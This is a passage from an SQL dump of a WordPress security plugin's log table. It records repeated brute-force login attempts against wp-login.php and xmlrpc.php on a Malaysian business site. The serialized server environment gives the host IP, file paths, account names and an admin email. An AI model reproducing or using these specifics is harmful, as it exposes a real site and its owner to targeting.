https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:29:\"/sbin:/usr/sbin:/bin:/usr/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1571396743.5239310264587402343750\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"51104\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571396743.5239310264587402343750\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xamch@DM3oDzMu3E5gMZ8wAAAJA\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xamch@DM3oDzMu3E5gMZ8wAAAJA\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"51104\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xamch@DM3oDzMu3E5gMZ8wAAAJA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571397649.5575\";s:12:\"REQUEST_TIME\";s:10:\"1571397649\";}}','notice','2019-10-18 11:20:54','2019-10-18 11:20:50',35416816,35670040,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1571396743.5239310264587402343750',1,0,'103.6.198.69'),(23395,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"134.209.38.25\";s:11:\"REMOTE_PORT\";s:5:\"38378\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWThkWXkG1atThADMYGnwwAAAMk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566892433.7954\";s:12:\"REQUEST_TIME\";s:10:\"1566892433\";}}','notice','2019-08-27 07:53:55','2019-08-27 07:53:54',17683760,19175656,'https://bintara.com.my/wp-login.php',1,0,'134.209.38.25'),(23396,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.169.138.13\";s:11:\"REMOTE_PORT\";s:5:\"57540\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTj3ItV65@1l3w0lHNqbAAAAEo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566893020.8254\";s:12:\"REQUEST_TIME\";s:10:\"1566893020\";}}','notice','2019-08-27 08:03:42','2019-08-27 08:03:41',17682160,19173672,'https://bintara.com.my/wp-login.php',1,0,'192.169.138.13');
INSERT INTO `wpdp_itsec_logs` (`id`, `parent_id`, `module`, `code`, `data`, `type`, `timestamp`, `init_timestamp`, `memory_current`, `memory_peak`, `url`, `blog_id`, `user_id`, `remote_ip`) VALUES (23397,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"134.209.216.249\";s:11:\"REMOTE_PORT\";s:5:\"34278\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTmCLdCvC5@KvzqwiFNhQAAABM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566893576.3701\";s:12:\"REQUEST_TIME\";s:10:\"1566893576\";}}','notice','2019-08-27 08:12:57','2019-08-27 08:12:56',17685408,19176352,'https://bintara.com.my/wp-login.php',1,0,'134.209.216.249'),(23398,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.65.235.38\";s:11:\"REMOTE_PORT\";s:5:\"37560\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWToJItV65@1l3w0lHNtOgAAAFc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566894116.7731\";s:12:\"REQUEST_TIME\";s:10:\"1566894116\";}}','notice','2019-08-27 08:21:58','2019-08-27 08:21:57',17683584,19174920,'https://bintara.com.my/wp-login.php',1,0,'159.65.235.38'),(23399,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.65.235.38\";s:11:\"REMOTE_PORT\";s:5:\"37962\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWToKGXkG1atThADMYGoowAAANA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566894120.1462\";s:12:\"REQUEST_TIME\";s:10:\"1566894120\";}}','notice','2019-08-27 08:22:01','2019-08-27 08:22:00',18201464,19501448,'https://bintara.com.my/xmlrpc.php',1,0,'159.65.235.38'),(23400,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.32.211.153\";s:11:\"REMOTE_PORT\";s:5:\"33285\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTsAItV65@1l3w0lHNv9wAAAFg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566895104.2013\";s:12:\"REQUEST_TIME\";s:10:\"1566895104\";}}','notice','2019-08-27 08:38:26','2019-08-27 08:38:24',17682832,19173392,'https://bintara.com.my/wp-login.php',1,0,'178.32.211.153'),(23401,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"487\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"13.235.120.53\";s:11:\"REMOTE_PORT\";s:5:\"33344\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTsSItV65@1l3w0lHNwJgAAAFg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566895176.5988\";s:12:\"REQUEST_TIME\";s:10:\"1566895176\";}}','notice','2019-08-27 08:39:40','2019-08-27 08:39:37',18303992,19586400,'https://bintara.com.my/xmlrpc.php',1,0,'13.235.120.53'),(23402,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 